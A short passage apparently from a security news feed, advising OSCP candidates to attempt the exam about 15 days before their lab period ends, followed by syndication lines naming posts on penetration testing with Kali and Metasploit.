If you are going to do a 60- or 90-day lab period and worry about not passing the OSCP exam on the first try, professionals recommend that you take an exam attempt about 15 days before the end of your lab time. If you do this and fail, you will have the opportunity to revisit the laboratory and review your weak areas before making another test attempt.

The post How to do offensive Penetration Testing with Kali? appeared first on Information Security Newspaper | Hacking News.

The post Penetration testing with Metasploit made easy appeared first on Information Security Newspaper | Hacking News.